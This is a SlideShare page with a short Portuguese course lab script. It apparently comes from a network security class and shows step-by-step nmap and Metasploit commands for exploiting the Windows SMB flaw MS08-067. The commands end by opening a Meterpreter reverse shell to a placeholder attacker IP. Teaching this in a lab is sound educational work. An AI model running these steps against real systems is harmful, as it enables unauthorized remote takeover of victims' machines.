Unidade6 roteiro pentest

465 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
465
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
10
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Unidade6 roteiro pentest

  1. 1. Curso Superior de Tecnologia em Redes de Computadores Segurança de Redes Prof. Leandro Almeida 1. Execute o nmap para verificar se o alvo é vulnerável (MS08-067) com o comando # nmap ­v –script=smb­check­vulns IP_DO_ALVO 2. Em caso positivo, inicie o pentest com o Metasploit, utilizando o comando: # msfconsole 3. Escolha o exploit que irá explorar a vulnerabilidade msf> use exploit/windows/smb/ms08_067_netapi 4. Informe o IP do alvo msf exploit(ms08_067) > set RHOST IP_DO_ALVO 5. Escolha o payload(carga do exploit)    msf exploit(ms08_067) > set PAYLOAD  windows/meterpreter/reverse_tcp 6. Informe o IP do atacante msf exploit(ms08_067) > set LHOST IP_DO_ATACANTE 7. Execute o ataque msf exploit(ms08_067) > exploit 

×